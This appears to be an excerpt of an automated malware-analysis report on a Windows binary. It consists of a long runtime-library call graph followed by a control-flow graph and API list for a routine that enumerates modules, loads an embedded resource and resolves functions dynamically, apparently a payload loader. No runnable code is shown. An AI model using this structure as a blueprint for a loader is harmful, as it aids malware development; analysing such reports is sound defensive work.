calls 14838->14839 14840 4176c7 14839->14840 14841 40b6b5 __read_nolock 62 API calls 14840->14841 14842 4176cf 14841->14842 14843 40b6b5 __read_nolock 62 API calls 14842->14843 14844 4176d7 14843->14844 14845 40b6b5 __read_nolock 62 API calls 14844->14845 14846 4176df 14845->14846 14847 40b6b5 __read_nolock 62 API calls 14846->14847 14848 4176e7 14847->14848 14849 40b6b5 __read_nolock 62 API calls 14848->14849 14850 4176ef 14849->14850 14851 40b6b5 __read_nolock 62 API calls 14850->14851 14852 4176f7 14851->14852 14853 40b6b5 __read_nolock 62 API calls 14852->14853 14854 417702 14853->14854 14855 40b6b5 __read_nolock 62 API calls 14854->14855 14856 41770a 14855->14856 14857 40b6b5 __read_nolock 62 API calls 14856->14857 14858 417712 14857->14858 14859 40b6b5 __read_nolock 62 API calls 14858->14859 14860 41771a 14859->14860 14861 40b6b5 __read_nolock 62 API calls 14860->14861 
14862 417722 14861->14862 14863 40b6b5 __read_nolock 62 API calls 14862->14863 14864 41772a 14863->14864 14865 40b6b5 __read_nolock 62 API calls 14864->14865 14866 417732 14865->14866 14867 40b6b5 __read_nolock 62 API calls 14866->14867 14868 41773a 14867->14868 14869 40b6b5 __read_nolock 62 API calls 14868->14869 14870 417742 14869->14870 14871 40b6b5 __read_nolock 62 API calls 14870->14871 14872 41774a 14871->14872 14873 40b6b5 __read_nolock 62 API calls 14872->14873 14874 417752 14873->14874 14875 40b6b5 __read_nolock 62 API calls 14874->14875 14876 41775a 14875->14876 14877 40b6b5 __read_nolock 62 API calls 14876->14877 14878 417762 14877->14878 14879 40b6b5 __read_nolock 62 API calls 14878->14879 14880 41776a 14879->14880 14881 40b6b5 __read_nolock 62 API calls 14880->14881 14882 417772 14881->14882 14883 40b6b5 __read_nolock 62 API calls 14882->14883 14884 41777a 14883->14884 14885 40b6b5 __read_nolock 62 API calls 14884->14885 14886 417788 14885->14886 14887 40b6b5 __read_nolock 62 API calls 14886->14887 14888 417793 14887->14888 14889 40b6b5 __read_nolock 62 API calls 14888->14889 14890 41779e 14889->14890 14891 40b6b5 __read_nolock 62 API calls 14890->14891 14892 4177a9 14891->14892 14893 40b6b5 __read_nolock 62 API calls 14892->14893 14894 4177b4 14893->14894 14895 40b6b5 __read_nolock 62 API calls 14894->14895 14896 4177bf 14895->14896 14897 40b6b5 __read_nolock 62 API calls 14896->14897 14898 4177ca 14897->14898 14899 40b6b5 __read_nolock 62 API calls 14898->14899 14900 4177d5 14899->14900 14901 40b6b5 __read_nolock 62 API calls 14900->14901 14902 4177e0 14901->14902 14903 40b6b5 __read_nolock 62 API calls 14902->14903 14904 4177eb 14903->14904 14905 40b6b5 __read_nolock 62 API calls 14904->14905 14905->14906 14906->14775 14907->14750 14909 413f1f 14908->14909 14911 413e6d _memset 14908->14911 14913 40ce09 ___convertcp 5 API calls 14909->14913 14918 417625 14911->14918 14915 413fca 14913->14915 14915->14709 14917 417426 ___crtLCMapStringA 97 API calls 
14917->14909 14919 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 14918->14919 14920 417638 14919->14920 14928 41746b 14920->14928 14923 417426 14924 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 14923->14924 14925 417439 14924->14925 14994 417081 14925->14994 14929 4174b7 14928->14929 14930 41748c GetStringTypeW 14928->14930 14931 4174a4 14929->14931 14933 41759e 14929->14933 14930->14931 14932 4174ac GetLastError 14930->14932 14934 4174f0 MultiByteToWideChar 14931->14934 14951 417598 14931->14951 14932->14929 14956 417a20 GetLocaleInfoA 14933->14956 14939 41751d 14934->14939 14934->14951 14936 40ce09 ___convertcp 5 API calls 14938 413eda 14936->14938 14938->14923 14942 417532 _memset ___convertcp 14939->14942 14943 40b84d _malloc 62 API calls 14939->14943 14940 4175ef GetStringTypeA 14941 41760a 14940->14941 14940->14951 14946 40b6b5 __read_nolock 62 API calls 14941->14946 14945 41756b MultiByteToWideChar 14942->14945 14942->14951 14943->14942 14948 417581 GetStringTypeW 14945->14948 14949 417592 14945->14949 14946->14951 14948->14949 14952 4147ae 14949->14952 14951->14936 14953 4147ba 14952->14953 14954 4147cb 14952->14954 14953->14954 14955 40b6b5 __read_nolock 62 API calls 14953->14955 14954->14951 14955->14954 14957 417a53 14956->14957 14958 417a4e 14956->14958 14987 416f54 14957->14987 14960 40ce09 ___convertcp 5 API calls 14958->14960 14961 4175c2 14960->14961 14961->14940 14961->14951 14962 417a69 14961->14962 14963 417aa9 GetCPInfo 14962->14963 14967 417b33 14962->14967 14964 417ac0 14963->14964 14965 417b1e MultiByteToWideChar 14963->14965 14964->14965 14968 417ac6 GetCPInfo 14964->14968 14965->14967 14971 417ad9 _strlen 14965->14971 14966 40ce09 ___convertcp 5 API calls 14969 4175e3 14966->14969 14967->14966 14968->14965 14970 417ad3 14968->14970 14969->14940 14969->14951 14970->14965 14970->14971 14972 40b84d _malloc 62 API calls 14971->14972 14976 417b0b _memset ___convertcp 14971->14976 14972->14976 14973 417b68 MultiByteToWideChar 14974 417b80 
14973->14974 14975 417b9f 14973->14975 14978 417ba4 14974->14978 14979 417b87 WideCharToMultiByte 14974->14979 14977 4147ae __freea 62 API calls 14975->14977 14976->14967 14976->14973 14977->14967 14980 417bc3 14978->14980 14981 417baf WideCharToMultiByte 14978->14981 14979->14975 14982 411cba __calloc_crt 62 API calls 14980->14982 14981->14975 14981->14980 14983 417bcb 14982->14983 14983->14975 14984 417bd4 WideCharToMultiByte 14983->14984 14984->14975 14985 417be6 14984->14985 14986 40b6b5 __read_nolock 62 API calls 14985->14986 14986->14975 14990 41a354 14987->14990 14991 41a36d 14990->14991 14992 41a125 strtoxl 86 API calls 14991->14992 14993 416f65 14992->14993 14993->14958 14995 4170a2 LCMapStringW 14994->14995 14998 4170bd 14994->14998 14996 4170c5 GetLastError 14995->14996 14995->14998 14996->14998 14997 4172bb 15000 417a20 ___ansicp 86 API calls 14997->15000 14998->14997 14999 417117 14998->14999 15001 417130 MultiByteToWideChar 14999->15001 15017 4172b2 14999->15017 15002 4172e3 15000->15002 15004 41715d 15001->15004 15001->15017 15006 4173d7 LCMapStringA 15002->15006 15007 4172fc 15002->15007 15002->15017 15003 40ce09 ___convertcp 5 API calls 15005 413efa 15003->15005 15012 40b84d _malloc 62 API calls 15004->15012 15022 417176 ___convertcp 15004->15022 15005->14917 15008 417333 15006->15008 15009 417a69 ___convertcp 69 API calls 15007->15009 15011 4173fe 15008->15011 15016 40b6b5 __read_nolock 62 API calls 15008->15016 15013 41730e 15009->15013 15010 4171ae MultiByteToWideChar 15014 4171c7 LCMapStringW 15010->15014 15015 4172a9 15010->15015 15011->15017 15023 40b6b5 __read_nolock 62 API calls 15011->15023 15012->15022 15013->15017 15018 417318 LCMapStringA 15013->15018 15014->15015 15020 4171e8 15014->15020 15019 4147ae __freea 62 API calls 15015->15019 15016->15011 15017->15003 15018->15008 15027 41733a 15018->15027 15019->15017 15021 4171f1 15020->15021 15026 41721a 15020->15026 15021->15015 15024 417203 LCMapStringW 15021->15024 15022->15010 
15022->15017 15023->15017 15024->15015 15025 417269 LCMapStringW 15028 417281 WideCharToMultiByte 15025->15028 15029 4172a3 15025->15029 15031 417235 ___convertcp 15026->15031 15033 40b84d _malloc 62 API calls 15026->15033 15030 40b84d _malloc 62 API calls 15027->15030 15032 41734b _memset ___convertcp 15027->15032 15028->15029 15034 4147ae __freea 62 API calls 15029->15034 15030->15032 15031->15015 15031->15025 15032->15008 15035 417389 LCMapStringA 15032->15035 15033->15031 15034->15015 15037 4173a5 15035->15037 15038 4173a9 15035->15038 15040 4147ae __freea 62 API calls 15037->15040 15039 417a69 ___convertcp 69 API calls 15038->15039 15039->15037 15040->15008 15041->14712 15043 41358c 15042->15043 15044 41046e __encode_pointer 6 API calls 15043->15044 15045 4135a4 15043->15045 15044->15043 15045->14171 15049 40d281 15046->15049 15048 40d2ca 15048->14173 15050 40d28d __sopen_helper 15049->15050 15057 40e806 15050->15057 15056 40d2ae __sopen_helper 15056->15048 15058 40d6e0 __lock 62 API calls 15057->15058 15059 40d292 15058->15059 15060 40d196 15059->15060 15061 4104e9 __decode_pointer 6 API calls 15060->15061 15062 40d1aa 15061->15062 15063 4104e9 __decode_pointer 6 API calls 15062->15063 15064 40d1ba 15063->15064 15065 40d23d 15064->15065 15080 40e56a 15064->15080 15077 40d2b7 15065->15077 15067 41046e __encode_pointer 6 API calls 15068 40d232 15067->15068 15072 41046e __encode_pointer 6 API calls 15068->15072 15069 40d1fc 15069->15065 15073 411d06 __realloc_crt 72 API calls 15069->15073 15074 40d212 15069->15074 15070 40d1d8 15070->15069 15076 40d224 15070->15076 15093 411d06 15070->15093 15072->15065 15073->15074 15074->15065 15075 41046e __encode_pointer 6 API calls 15074->15075 15075->15076 15076->15067 15142 40e80f 15077->15142 15081 40e576 __sopen_helper 15080->15081 15082 40e5a3 15081->15082 15083 40e586 15081->15083 15085 40e5e4 HeapSize 15082->15085 15086 40d6e0 __lock 62 API calls 15082->15086 15084 40bfc1 __sopen_helper 62 API calls 15083->15084 
15087 40e58b 15084->15087 15089 40e59b __sopen_helper 15085->15089 15090 40e5b3 ___sbh_find_block 15086->15090 15088 40e744 __sopen_helper 6 API calls 15087->15088 15088->15089 15089->15070 15098 40e604 15090->15098 15094 411d0f 15093->15094 15096 411d4e 15094->15096 15097 411d2f Sleep 15094->15097 15102 40e34f 15094->15102 15096->15069 15097->15094 15101 40d606 LeaveCriticalSection 15098->15101 15100 40e5df 15100->15085 15100->15089 15101->15100 15103 40e35b __sopen_helper 15102->15103 15104 40e370 15103->15104 15105 40e362 15103->15105 15107 40e383 15104->15107 15108 40e377 15104->15108 15106 40b84d _malloc 62 API calls 15105->15106 15110 40e36a __dosmaperr __sopen_helper 15106->15110 15115 40e4f5 15107->15115 15136 40e390 _memcpy_s ___sbh_resize_block ___sbh_find_block 15107->15136 15109 40b6b5 __read_nolock 62 API calls 15108->15109 15109->15110 15110->15094 15111 40e528 15113 40d2e3 _realloc 6 API calls 15111->15113 15112 40e4fa HeapReAlloc 15112->15110 15112->15115 15116 40e52e 15113->15116 15114 40d6e0 __lock 62 API calls 15114->15136 15115->15111 15115->15112 15117 40e54c 15115->15117 15119 40d2e3 _realloc 6 API calls 15115->15119 15121 40e542 15115->15121 15118 40bfc1 __sopen_helper 62 API calls 15116->15118 15117->15110 15120 40bfc1 __sopen_helper 62 API calls 15117->15120 15118->15110 15119->15115 15122 40e555 GetLastError 15120->15122 15124 40bfc1 __sopen_helper 62 API calls 15121->15124 15122->15110 15126 40e4c3 15124->15126 15125 40e41b HeapAlloc 15125->15136 15126->15110 15128 40e4c8 GetLastError 15126->15128 15127 40e470 HeapReAlloc 15127->15136 15128->15110 15129 40def2 ___sbh_alloc_block 5 API calls 15129->15136 15130 40e4db 15130->15110 15132 40bfc1 __sopen_helper 62 API calls 15130->15132 15131 40d2e3 _realloc 6 API calls 15131->15136 15133 40e4e8 15132->15133 15133->15110 15133->15122 15134 40e4be 15135 40bfc1 __sopen_helper 62 API calls 15134->15135 15135->15126 15136->15110 15136->15111 15136->15114 15136->15125 15136->15127 15136->15129 
15136->15130 15136->15131 15136->15134 15137 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 15136->15137 15138 40e493 15136->15138 15137->15136 15141 40d606 LeaveCriticalSection 15138->15141 15140 40e49a 15140->15136 15141->15140 15145 40d606 LeaveCriticalSection 15142->15145 15144 40d2bc 15144->15056 15145->15144 15149 40b9aa __sopen_helper _strnlen 15146->15149 15147 40b9b8 15148 40bfc1 __sopen_helper 62 API calls 15147->15148 15150 40b9bd 15148->15150 15149->15147 15152 40b9ec 15149->15152 15151 40e744 __sopen_helper 6 API calls 15150->15151 15156 40b9cd __sopen_helper 15151->15156 15153 40d6e0 __lock 62 API calls 15152->15153 15154 40b9f3 15153->15154 15203 40b917 15154->15203 15156->14177 15160 4017cc _memcpy_s 15159->15160 15160->14181 15163 40af70 15161->15163 15162 40b84d _malloc 62 API calls 15162->15163 15163->15162 15164 40af8a 15163->15164 15165 40d2e3 _realloc 6 API calls 15163->15165 15167 40af8c std::bad_alloc::bad_alloc 15163->15167 15164->14186 15165->15163 15169 40d2bd __cinit 73 API calls 15167->15169 15171 40afb2 15167->15171 15169->15171 15417 40af49 15171->15417 15172 40afca 15174 401903 lstrlenA 15173->15174 15175 4018fc 15173->15175 15429 4017e0 15174->15429 15175->14209 15178 401940 GetLastError 15180 40194b MultiByteToWideChar 15178->15180 15181 40198d 15178->15181 15179 401996 15179->14209 15182 4017e0 72 API calls 15180->15182 15181->15179 15437 401030 GetLastError 15181->15437 15184 401970 MultiByteToWideChar 15182->15184 15184->15181 15186 40af66 74 API calls 15185->15186 15187 40187c 15186->15187 15188 401885 SysAllocString 15187->15188 15189 4018a4 15187->15189 15188->15189 15189->14211 15191 40231a SafeArrayUnaccessData 15190->15191 15191->14218 15193 4019df VariantClear 15192->15193 15194 4019aa InterlockedDecrement 15192->15194 15193->14225 15194->15193 15195 4019b8 15194->15195 15195->15193 15196 4019c2 SysFreeString 15195->15196 15197 4019c9 15195->15197 15196->15197 15446 40aec0 15197->15446 15200 401571 
15199->15200 15202 401582 15199->15202 15452 40afe0 15200->15452 15202->14194 15204 40b930 15203->15204 15206 40b92c 15203->15206 15204->15206 15207 40b942 _strlen 15204->15207 15212 40eeab 15204->15212 15209 40ba18 15206->15209 15207->15206 15222 40edfb 15207->15222 15416 40d606 LeaveCriticalSection 15209->15416 15211 40ba1f 15211->15156 15219 40ef2b 15212->15219 15220 40eec6 15212->15220 15213 40eecc WideCharToMultiByte 15213->15219 15213->15220 15214 411cba __calloc_crt 62 API calls 15214->15220 15215 40eeef WideCharToMultiByte 15216 40ef37 15215->15216 15215->15220 15217 40b6b5 __read_nolock 62 API calls 15216->15217 15217->15219 15219->15207 15220->15213 15220->15214 15220->15215 15220->15219 15221 40b6b5 __read_nolock 62 API calls 15220->15221 15225 414d44 15220->15225 15221->15220 15317 40ed0d 15222->15317 15226 414d76 15225->15226 15227 414d59 15225->15227 15229 414dd4 15226->15229 15271 417e7e 15226->15271 15228 40bfc1 __sopen_helper 62 API calls 15227->15228 15230 414d5e 15228->15230 15231 40bfc1 __sopen_helper 62 API calls 15229->15231 15233 40e744 __sopen_helper 6 API calls 15230->15233 15260 414d6e 15231->15260 15233->15260 15235 414db5 15237 414e12 15235->15237 15238 414de7 15235->15238 15239 414dcb 15235->15239 15237->15260 15282 414c98 15237->15282 15241 411c75 __malloc_crt 62 API calls 15238->15241 15238->15260 15242 40eeab ___wtomb_environ 119 API calls 15239->15242 15244 414df7 15241->15244 15245 414dd0 15242->15245 15244->15237 15251 411c75 __malloc_crt 62 API calls 15244->15251 15244->15260 15245->15229 15245->15237 15246 414e8f 15247 414f7a 15246->15247 15252 414e98 15246->15252 15250 40b6b5 __read_nolock 62 API calls 15247->15250 15248 414e41 15249 40b6b5 __read_nolock 62 API calls 15248->15249 15255 414e4b 15249->15255 15250->15260 15251->15237 15253 411d54 __recalloc_crt 73 API calls 15252->15253 15252->15260 15256 414e51 _strlen 15253->15256 15254 414f5e 15258 40b6b5 __read_nolock 62 API calls 15254->15258 15254->15260 15255->15256 15286 
411d54 15255->15286 15256->15254 15259 411cba __calloc_crt 62 API calls 15256->15259 15256->15260 15258->15260 15261 414efb _strlen 15259->15261 15260->15220 15261->15254 15262 40ef42 _strcpy_s 62 API calls 15261->15262 15263 414f14 15262->15263 15264 414f28 SetEnvironmentVariableA 15263->15264 15265 40e61c __invoke_watson 10 API calls 15263->15265 15266 414f49 15264->15266 15267 414f52 15264->15267 15268 414f25 15265->15268 15269 40bfc1 __sopen_helper 62 API calls 15266->15269 15270 40b6b5 __read_nolock 62 API calls 15267->15270 15268->15264 15269->15267 15270->15254 15291 417dc2 15271->15291 15273 414d89 15273->15229 15273->15235 15274 414cea 15273->15274 15275 414cfb 15274->15275 15279 414d3b 15274->15279 15276 411cba __calloc_crt 62 API calls 15275->15276 15278 414d12 15276->15278 15277 414d24 15277->15279 15298 417d6d 15277->15298 15278->15277 15280 40e79a __amsg_exit 62 API calls 15278->15280 15279->15235 15280->15277 15285 414ca6 15282->15285 15283 40edfb __fassign 106 API calls 15283->15285 15284 414ccd 15284->15246 15284->15248 15285->15283 15285->15284 15289 411d5d 15286->15289 15288 411da0 15288->15256 15289->15288 15290 411d81 Sleep 15289->15290 15306 40b783 15289->15306 15290->15289 15292 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 15291->15292 15293 417dd6 15292->15293 15294 40bfc1 __sopen_helper 62 API calls 15293->15294 15297 417df4 __mbschr_l 15293->15297 15295 417de4 15294->15295 15296 40e744 __sopen_helper 6 API calls 15295->15296 15296->15297 15297->15273 15299 417d7e _strlen 15298->15299 15305 417d7a 15298->15305 15300 40b84d _malloc 62 API calls 15299->15300 15301 417d91 15300->15301 15302 40ef42 _strcpy_s 62 API calls 15301->15302 15301->15305 15303 417da3 15302->15303 15304 40e61c __invoke_watson 10 API calls 15303->15304 15303->15305 15304->15305 15305->15277 15307 40b792 15306->15307 15308 40b7ba 15306->15308 15307->15308 15310 40b79e 15307->15310 15309 40b7cf 15308->15309 15311 40e56a __msize 63 API calls 15308->15311 15312 40e34f 
_realloc 71 API calls 15309->15312 15313 40bfc1 __sopen_helper 62 API calls 15310->15313 15311->15309 15316 40b7b3 _memset 15312->15316 15314 40b7a3 15313->15314 15315 40e744 __sopen_helper 6 API calls 15314->15315 15315->15316 15316->15289 15318 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 15317->15318 15319 40ed21 15318->15319 15320 40ed42 15319->15320 15322 40ed75 15319->15322 15334 40ed2a 15319->15334 15321 40bfc1 __sopen_helper 62 API calls 15320->15321 15325 40ed47 15321->15325 15323 40ed99 15322->15323 15324 40ed7f 15322->15324 15327 40eda1 15323->15327 15328 40edb5 15323->15328 15326 40bfc1 __sopen_helper 62 API calls 15324->15326 15329 40e744 __sopen_helper 6 API calls 15325->15329 15330 40ed84 15326->15330 15335 414b9e 15327->15335 15355 414b5c 15328->15355 15329->15334 15333 40e744 __sopen_helper 6 API calls 15330->15333 15333->15334 15334->15207 15336 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 15335->15336 15337 414bb2 15336->15337 15338 414bd3 15337->15338 15340 414c06 15337->15340 15353 414bbb 15337->15353 15339 40bfc1 __sopen_helper 62 API calls 15338->15339 15341 414bd8 15339->15341 15342 414c10 15340->15342 15343 414c2a 15340->15343 15346 40e744 __sopen_helper 6 API calls 15341->15346 15347 40bfc1 __sopen_helper 62 API calls 15342->15347 15344 414c34 15343->15344 15345 414c49 15343->15345 15360 417c1d 15344->15360 15349 414b5c ___crtCompareStringA 95 API calls 15345->15349 15346->15353 15350 414c15 15347->15350 15351 414c63 15349->15351 15352 40e744 __sopen_helper 6 API calls 15350->15352 15351->15353 15354 40bfc1 __sopen_helper 62 API calls 15351->15354 15352->15353 15353->15334 15354->15353 15356 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 15355->15356 15357 414b6f 15356->15357 15376 4147ec 15357->15376 15361 417c33 15360->15361 15374 417c58 ___ascii_strnicmp 15360->15374 15362 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 15361->15362 15363 417c3e 15362->15363 15364 417c43 15363->15364 15365 417c78 15363->15365 15366 40bfc1 
__sopen_helper 62 API calls 15364->15366 15367 417c82 15365->15367 15375 417caa 15365->15375 15368 417c48 15366->15368 15369 40bfc1 __sopen_helper 62 API calls 15367->15369 15370 40e744 __sopen_helper 6 API calls 15368->15370 15371 417c87 15369->15371 15370->15374 15372 40e744 __sopen_helper 6 API calls 15371->15372 15372->15374 15373 4168fc 97 API calls __tolower_l 15373->15375 15374->15353 15375->15373 15375->15374 15377 414818 CompareStringW 15376->15377 15381 41482f strncnt 15376->15381 15378 41483b GetLastError 15377->15378 15377->15381 15378->15381 15379 40ce09 ___convertcp 5 API calls 15382 414b5a 15379->15382 15380 414a95 15384 417a20 ___ansicp 86 API calls 15380->15384 15381->15380 15383 4148a4 15381->15383 15402 414881 15381->15402 15382->15334 15385 414962 MultiByteToWideChar 15383->15385 15389 4148e6 GetCPInfo 15383->15389 15383->15402 15387 414abb 15384->15387 15396 414982 15385->15396 15385->15402 15386 414b1c CompareStringA 15388 414b3a 15386->15388 15386->15402 15387->15386 15390 417a69 ___convertcp 69 API calls 15387->15390 15387->15402 15391 40b6b5 __read_nolock 62 API calls 15388->15391 15392 4148f7 15389->15392 15389->15402 15393 414ae0 15390->15393 15394 414b40 15391->15394 15392->15385 15392->15402 15401 417a69 ___convertcp 69 API calls 15393->15401 15393->15402 15398 40b6b5 __read_nolock 62 API calls 15394->15398 15395 4149d9 MultiByteToWideChar 15399 4149f2 MultiByteToWideChar 15395->15399 15400 414a83 15395->15400 15397 40b84d _malloc 62 API calls 15396->15397 15405 41499f ___convertcp 15396->15405 15397->15405 15398->15402 15399->15400 15410 414a09 15399->15410 15404 4147ae __freea 62 API calls 15400->15404 15403 414b01 15401->15403 15402->15379 15406 414b16 15403->15406 15407 414b0a 15403->15407 15404->15402 15405->15395 15405->15402 15406->15386 15408 40b6b5 __read_nolock 62 API calls 15407->15408 15408->15402 15409 414a53 MultiByteToWideChar 15412 414a66 CompareStringW 15409->15412 15413 414a7d 15409->15413 15411 40b84d _malloc 62 API 
calls 15410->15411 15414 414a1f ___convertcp 15410->15414 15411->15414 15412->15413 15415 4147ae __freea 62 API calls 15413->15415 15414->15400 15414->15409 15415->15400 15416->15211 15423 40d0f5 15417->15423 15420 40cd39 15421 40cd6e RaiseException 15420->15421 15422 40cd62 15420->15422 15421->15172 15422->15421 15424 40d115 _strlen 15423->15424 15428 40af59 15423->15428 15425 40b84d _malloc 62 API calls 15424->15425 15424->15428 15426 40d128 15425->15426 15427 40ef42 _strcpy_s 62 API calls 15426->15427 15426->15428 15427->15428 15428->15420 15430 4017e9 15429->15430 15431 401844 15430->15431 15433 40b783 __recalloc 72 API calls 15430->15433 15435 40182d 15430->15435 15436 40186d MultiByteToWideChar 15431->15436 15439 40b743 15431->15439 15433->15435 15434 40b6b5 __read_nolock 62 API calls 15434->15431 15435->15431 15435->15434 15436->15178 15436->15179 15438 40103a 15437->15438 15440 40e231 __calloc_impl 62 API calls 15439->15440 15441 40b75d 15440->15441 15442 40bfc1 __sopen_helper 62 API calls 15441->15442 15445 40b779 15441->15445 15443 40b770 15442->15443 15444 40bfc1 __sopen_helper 62 API calls 15443->15444 15443->15445 15444->15445 15445->15431 15447 40b6b5 __sopen_helper 15446->15447 15448 40b73d __sopen_helper 15447->15448 15449 40b714 HeapFree 15447->15449 15448->15193 15449->15448 15450 40b727 15449->15450 15451 40bfc1 __sopen_helper 62 API calls 15450->15451 15451->15448 15453 40aff8 15452->15453 15454 40b01f __VEC_memcpy 15453->15454 15455 40b027 15453->15455 15454->15455 15455->15202 15457 4104e0 _doexit 6 API calls 15456->15457 15458 40ea5c __init_pointers __initp_misc_winsig 15457->15458 15473 41393d 15458->15473 15461 41046e __encode_pointer 6 API calls 15462 40ea98 15461->15462 15462->14250 15466 40d56f 15463->15466 15464 41389c __getstream InitializeCriticalSectionAndSpinCount 15464->15466 15465 40d59d 15465->14240 15465->14260 15466->15464 15466->15465 15468 4105a2 15467->15468 15472 4105ae 15467->15472 15471 4104e9 __decode_pointer 6 API calls 
15468->15471 15469 4105d0 15469->15469 15470 4105c2 TlsFree 15470->15469 15471->15472 15472->15469 15472->15470 15474 41046e __encode_pointer 6 API calls 15473->15474 15475 40ea8e 15474->15475 15475->15461 15479 41265c 15476->15479 15478 4126c9 15480 4127c7 15478->15480 15481 416836 72 API calls _parse_cmdline 15478->15481 15479->15478 15482 416836 15479->15482 15480->14283 15480->14284 15481->15478 15485 4167e3 15482->15485 15486 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 15485->15486 15487 4167f6 15486->15487 15487->15479 15489 40e8ea __sopen_helper 15488->15489 15490 40d6e0 __lock 62 API calls 15489->15490 15491 40e8f1 15490->15491 15493 4104e9 __decode_pointer 6 API calls 15491->15493 15497 40e9aa __initterm 15491->15497 15495 40e928 15493->15495 15495->15497 15499 4104e9 __decode_pointer 6 API calls 15495->15499 15496 40e9f2 __sopen_helper 15496->14289 15505 40e9f5 15497->15505 15503 40e93d 15499->15503 15500 40e9e9 15501 40e7ee _doexit 3 API calls 15500->15501 15501->15496 15502 4104e0 6 API calls _doexit 15502->15503 15503->15497 15503->15502 15504 4104e9 6 API calls __decode_pointer 15503->15504 15504->15503 15506 40e9fb 15505->15506 15508 40e9d6 15505->15508 15510 40d606 LeaveCriticalSection 15506->15510 15508->15496 15509 40d606 LeaveCriticalSection 15508->15509 15509->15500 15510->15508

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 34 401cd0-401cd4 24->34 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 41 401f1c-401f2f 30->41 42 401f5f-401f69 30->42 35 401cf0-401cf2 34->35 36 401cd6-401cd8 34->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->34 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 69 401d5d-401d7b call 401650 65->69 67->63 71 401d42-401d4a 67->71 68->65 76 401d80-401d84 69->76 71->61 71->68 78 401da0-401da2 76->78 79 401d86-401d88 76->79 84 401da5-401da7 78->84 82 401d8a-401d90 79->82 83 401d9c-401d9e 79->83 82->78 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->76 86->83 87->7 
87->54 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 70d01c 122->154 155 40234e call 70d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 70d01c 135->152 153 402390 call 70d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 004019FD
                                                      • _getenv.LIBCMT ref: 00401ABA
                                                      • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                      • Module32First.KERNEL32 ref: 00401C48
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                      • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                      • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                      • _malloc.LIBCMT ref: 00401EBA
                                                      • _memset.LIBCMT ref: 00401EDD
                                                      • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                      Strings
                                                      Memory Dump Source
